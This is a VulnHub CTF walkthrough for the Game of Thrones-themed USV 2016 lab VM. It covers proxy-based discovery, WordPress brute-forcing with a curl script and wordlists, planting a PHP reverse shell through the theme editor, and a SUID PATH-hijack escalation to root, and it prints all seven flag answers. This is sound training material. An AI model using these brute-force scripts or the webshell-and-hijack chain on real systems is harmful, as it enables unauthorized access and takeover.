USV: 2016 v1.0.1

[ vulnhub ctf walkthrough ]

Goal

Capture all 7 flags, each in the format Country_name Flag: [md5 hash]

Download

https://www.vulnhub.com/entry/usv-2016,175/

Walkthrough

An initial nmap scan shows SSH on 22, HTTP on 80, a proxy on 3129, MySQL on 3306, and FTP on 21211.

Looking at SSH first, the banner reveals an ASCII dragon and what looks like a hash or an encrypted string.

Looking closer, the dragon has AES-ECB written near the top, so a quick Google search finds an online decoder, aesencryption.net. I took a stab at the key being xxxxx0000000xxxxxx, which is also shown in the dragon.
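The same decryption can be done locally with openssl, which avoids pasting a candidate flag into a third-party website. The following is an added example and not the decoder the post used; it assumes the banner string is base64, that padding is PKCS#7, and that a short ASCII key is NUL-padded to 16 bytes (a common convention for online AES tools, but an assumption here). The key and plaintext in the self-check are constructed.

```shell
#!/bin/sh
# Added example: AES-128-ECB with openssl instead of a web decoder.
# Assumptions (not from the original post): base64 ciphertext, PKCS#7 padding,
# and a short ASCII key truncated or NUL-padded to exactly 16 bytes.

# Turn an ASCII key into 32 hex characters (16 bytes): truncate with head, pad with zeros.
key_hex() {
  printf '%s' "$1" | head -c 16 | od -An -v -tx1 | tr -d ' \n' |
    awk '{ printf "%-32s", $0 }' | tr ' ' '0'
}

# $1 = key, $2 = plaintext; prints single-line base64 ciphertext.
aes_ecb_encrypt() {
  printf '%s' "$2" | openssl enc -aes-128-ecb -K "$(key_hex "$1")" -base64 -A
}

# $1 = key, $2 = base64 ciphertext; prints the recovered plaintext.
# For the banner: aes_ecb_decrypt '<key from the dragon>' '<string from the dragon>'
aes_ecb_decrypt() {
  printf '%s' "$2" | openssl enc -d -aes-128-ecb -K "$(key_hex "$1")" -base64 -A
}

# Self-check on a constructed secret so the script runs without the VM.
aes_ecb_selfcheck() {
  ct=$(aes_ecb_encrypt 'demokey' 'Demo Flag: 0123456789abcdef')
  aes_ecb_decrypt 'demokey' "$ct"
}

aes_ecb_selfcheck
```

If the decoder's key handling differs from the NUL-padding assumed here (for example a key hashed to 16 bytes), the ciphertext will come back as garbage rather than an error, so a failed decrypt says nothing about the key itself.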

The result was flag1:

Italy Flag: 0047449b33fbae830d833721edaef6f1

With no credentials for SSH, I browsed the website for clues but immediately got an access forbidden error.

Running dirb against it gave the same error.

Stuck, I remembered that nmap had revealed a Squid proxy on 3129.

As always, I run everything through Burp Suite, so I added the Squid proxy as an upstream proxy in Burp's settings.

The proxy setting did the trick, and the website reveals a single page with a changing banner of “WINTER IS COMING” and “ALL MEN MUST DIE”. Great…Game of Thrones, a show I know nothing about :(

The site didn't show much of anything else, so I ran dirb against it again, this time through the proxy. It reveals a WordPress site at /blog.

*snippet of dirb output

The Game of Thrones theme is confirmed as the blog turns out to be The Seven Kingdoms.

Since it's WordPress, I ran wpscan against it, and it reveals a base64-encoded string in the X-XSS-Protection response header.

*snippet of wpscan output

Decoding the string reveals flag2:

Croatia Flag: 0c326784214398aeb75044e9cd4c0ebb

Nothing else is revealed by wpscan, so going back to the site I find an interesting second post titled “I have a message for you!”

There is nothing else to the post, but looking at the image location reveals a very different path from the normal WordPress upload directory, wp-content/uploads.

Moving up one directory level reveals the message and a download link, which turns out to be a zip file.

Unzipping the file reveals an image named hodor, and the picture shows a base64-encoded string.

Decoding the string reveals flag3:

Portugal Flag: a2663b23045de56c7u96a406429f733f

Back on the site there are several long-winded, irrelevant posts in a row and then an interesting last one titled “Protected: The secret Chapter”.

*This one took some time; to spare yours, I won't go through my failures.

Looking back at all those long-winded, irrelevant posts, I decided to build a wordlist out of them with cewl.

Running the new wordlist through Burp Intruder also failed.

With that, I decided to look into how the password was being passed after submitting. It turns out the form does a POST and then a GET, with the addition of a cookie derived from the submitted password.

With that information, I set up Burp Intruder to follow redirects and process cookies.

I left the attack running overnight, as it's a slow process, but it finally revealed the password Westerosi, a base64-encoded string, and a new clue: “The mother_of_dragons has a password which is in front of your eyes”.
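The POST-then-GET cycle above is what makes a plain Intruder attack on the form miss: wp-login.php?action=postpass answers a 302 back to the Referer and sets a wp-postpass_<hash> cookie holding a phpass hash of the submitted password, and the post only renders once that cookie is presented on the follow-up GET. The script below is an added example driving the same cycle from curl; it is not the Burp configuration from the post. BASE, POST_PATH and PROXY are assumptions to adjust for your target, and the HTML used in the self-check is constructed.

```shell
#!/bin/sh
# Added example, not the post's tooling: probe a password-protected WordPress post
# with curl, carrying the wp-postpass cookie from the POST into the GET.
BASE="${BASE:-http://10.0.0.2}"        # assumed VM address
POST_PATH="${POST_PATH:-/blog/?p=42}"  # assumed URL of "Protected: The secret Chapter"
PROXY="${PROXY:-}"                      # e.g. http://10.0.0.2:3129 to go through squid
[ -n "$PROXY" ] && export http_proxy="$PROXY"   # curl honours http_proxy for http:// URLs

# Unlock check, kept separate so it can be run on saved HTML: WordPress keeps rendering
# the password form (an input named post_password) until the cookie is right.
# An empty body (network failure) counts as locked, so a dead target is not a false hit.
post_is_unlocked() {            # stdin: HTML of the post
  html=$(cat)
  [ -n "$html" ] && ! printf '%s' "$html" | grep -q 'name="post_password"'
}

# Try one candidate. -e sets the Referer WordPress redirects back to; -c/-b carry the jar.
wp_try_postpass() {
  pw=$1
  jar=$(mktemp)
  curl -s -o /dev/null -c "$jar" -e "$BASE$POST_PATH" \
    --data-urlencode "post_password=$pw" --data 'Submit=Enter' \
    "$BASE/wp-login.php?action=postpass"
  if curl -s -b "$jar" "$BASE$POST_PATH" | post_is_unlocked; then
    rm -f "$jar"
    echo "UNLOCKED with: $pw"
    return 0
  fi
  rm -f "$jar"
  return 1
}

# Walk a wordlist (one candidate per line, e.g. cewl output) and stop at the first hit.
wp_postpass_bruteforce() {
  while IFS= read -r cand || [ -n "$cand" ]; do
    [ -n "$cand" ] || continue
    wp_try_postpass "$cand" && return 0
  done < "$1"
  echo "no candidate unlocked the post"
  return 1
}

# Usage: PROXY=http://10.0.0.2:3129 wp_postpass_bruteforce wordlist.txt
```

Because every candidate costs two requests and the server hashes the password with phpass on each POST, this is as slow as the overnight Intruder run; the gain is only that it runs unattended and can be pointed through the Squid proxy by setting PROXY.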

Decoding the string reveals flag4:

Paraguay Flag: 4761b65f20053674657c7e6186628a29

Testing the password on the actual post reveals a picture.

Knowing nothing of Game of Thrones, I resorted to Google to see if there were any clues about Daenerys Targaryen's eyes. Apparently the actress is known for her eyebrows, so I tested every combination of eyebrow and brow that I could think of. No luck.

Stumped I looked at the clue again. The clue states “has a password which is in front of your eyes”…wait…it can’t be that easy. Could the password be “in front of your eyes”? Nope.

Then I remembered the other services: SSH, MySQL and FTP. Testing SSH fails, and MySQL shows that no remote connections are allowed. However, FTP works and reveals two text files, readme.txt and .note.txt.

The readme.txt file hints to look for a hidden file (already done), and .note.txt states that mother_of_dragons' WordPress password is her children's names.

Back to Google, where I find that Daenerys Targaryen has no children but three dragons named Rhaegal, Drogon and Viserion. So I put those names into a file along with various combinations of all three.
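Both wordlists in this section, the cewl list built from the blog posts earlier and the dragon-name combinations here, can be generated with a few lines of shell. The block below is an added example and not the post's cewl run or its name file; SAMPLE_HTML is constructed input rather than the real Seven Kingdoms page.

```shell
#!/bin/sh
# Added example, not the post's tooling: two wordlist builders. words_from_html does what
# cewl does (every word of a minimum length in the page text); name_combos emits every
# ordering of one, two or three names. SAMPLE_HTML is constructed, not the real blog.
SAMPLE_HTML='<html><body><h2>Winter is coming</h2><p>The North remembers, and Westeros waits.</p>
<p>Hodor! Hodor? hodor.</p><script>var x = 1;</script></body></html>'

# cewl-style extraction: strip tags, split on anything that is not a letter, keep words
# of at least $1 letters, one per line, deduplicated. Case is kept, as cewl keeps it.
words_from_html() {
  sed 's/<[^>]*>/ /g' | tr -cs '[:alpha:]' '\n' | awk -v min="$1" 'length($0) >= min' | sort -u
}

# Every ordering of one, two or three of the names, joined with $1 (use '' for none),
# each also emitted in lower case, deduplicated.
name_combos() {
  sep=$1; shift
  for a in "$@"; do
    echo "$a"
    for b in "$@"; do
      [ "$b" = "$a" ] && continue
      echo "$a$sep$b"
      for c in "$@"; do
        { [ "$c" = "$a" ] || [ "$c" = "$b" ]; } && continue
        echo "$a$sep$b$sep$c"
      done
    done
  done | awk '{ print; print tolower($0) }' | sort -u
}

# Usage:
#   curl -s http://10.0.0.2/blog/ | words_from_html 4 > posts.txt     # assumed VM address
#   name_combos '' Rhaegal Drogon Viserion > dragons.txt
printf '%s' "$SAMPLE_HTML" | words_from_html 4
name_combos '' Rhaegal Drogon Viserion
```

For three names the list is 30 entries (3 singles, 6 pairs, 6 triples, each in two cases), small enough that wpscan's login attack finishes in seconds; pass a separator such as '_' or '-' as the first argument if the first run misses.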

Running the list through wpscan reveals RhaegalDrogonViserion as the password.

*snippet of wpscan output

Now to test those credentials on the site…

and we’re in!

Looking around the admin side, I found the profile section, which reveals a base64-encoded string for mother_of_dragons.

Decoding the string reveals flag5:

Thailand Flag: 6ad7965d1e05ca98b3efc76dbf9fd733

With only two flags left, I figured it was time for shell access. As an admin of the site I'm able to edit the theme, so I replaced footer.php with the PHP reverse shell from pentestmonkey and set up my listener.

Boom!…a limited shell as user http.

Looking at /etc/passwd shows the home directory for http as /srv/http.

Changing to the /srv/http directory reveals the website files and directories, an interesting file named ‘winterfell_messenger’ that we'll come back to, and a text file named ‘reward_flag.txt’. Reading the reward file reveals a base64-encoded string.

Decoding the string reveals flag6:

Mongolia Flag: 6b49c13cccd91940f09d79e142108394

*Again, this one took some time; to spare yours, I won't go through my failures.

Back to the interesting file winterfell_messenger: it's executable, the SUID bit is set and the owner is root, so whatever it runs happens with root's privileges. Running the program shows that it uses cat to read a file in the /root directory.

Running strings on the binary confirms that cat is called, but without the full path to the program. From this we know the executable will be looked up in the directories listed in PATH, which we control.

Now we can update PATH with export, but first we need a writable directory; as usual, /tmp will do.

*snippet of output

Using export I put /tmp at the front of PATH so it is searched first.

Now we need to create an executable file in /tmp named cat so that winterfell_messenger picks it up instead of the real cat. Since this file will be run as root, why not have it launch a shell with /bin/sh?

And now running the winterfell_messenger program…root
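The whole privilege escalation rests on one resolution rule: a bare command name is searched for in PATH, left to right, and PATH belongs to the caller. The script below is an added example that reproduces that rule without root and is not the VM's binary: a stand-in "messenger" script calls cat by bare name as strings showed winterfell_messenger doing, and a second stand-in uses /bin/cat, which is the fix. Nothing here is SUID, so what it shows is which binary gets picked, not the privilege gain. All paths and contents are constructed.

```shell
#!/bin/sh
# Added example, not the VM's winterfell_messenger: PATH hijack of an unqualified
# "cat" call, beside the absolute-path version that is immune to it.
demo_path_hijack() {
  work=$(mktemp -d)
  printf 'contents of the protected note\n' > "$work/note.txt"

  # Vulnerable stand-in: relies on PATH lookup of cat (what strings showed on the VM).
  printf '#!/bin/sh\ncat "$1"\n' > "$work/messenger"
  # Hardened stand-in: absolute path, so PATH changes do not matter.
  printf '#!/bin/sh\n/bin/cat "$1"\n' > "$work/messenger_fixed"
  chmod 755 "$work/messenger" "$work/messenger_fixed"

  # Attacker-controlled directory with a fake cat (on the VM: /tmp/cat running /bin/sh).
  mkdir "$work/evil"
  printf '#!/bin/sh\necho HIJACKED\n' > "$work/evil/cat"
  chmod 755 "$work/evil/cat"

  normal=$("$work/messenger" "$work/note.txt")
  # PATH set for this one command only; no export, so nothing to undo afterwards.
  hijacked=$(PATH="$work/evil:$PATH" "$work/messenger" "$work/note.txt")
  fixed=$(PATH="$work/evil:$PATH" "$work/messenger_fixed" "$work/note.txt")

  rm -rf "$work"
  printf '%s|%s|%s\n' "$normal" "$hijacked" "$fixed"
}

demo_path_hijack
```

Setting PATH only for the one command, as the function does, is also why the later step of removing /tmp from PATH before reading the flag can be skipped: with `PATH=/tmp:$PATH ./winterfell_messenger` the exported PATH is never changed. One caveat the post did not hit: if /bin/sh on a target is bash, a shell started from a SUID process drops its effective uid unless run as bash -p, so check id in the resulting shell before concluding the hijack failed.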

Listing the /root directory reveals a .flag.txt file.

Before showing the contents of the file, PATH needs to be updated to remove the /tmp directory we added; otherwise cat would run our fake one again.

Now running cat on .flag.txt, we get a congratulations, a cute ASCII wolf, and a base64-encoded string.

Decoding the string reveals flag7:

Somalia Flag: 4a64a575be80f8ffab26b06a958bcf34

Written on January 1, 2017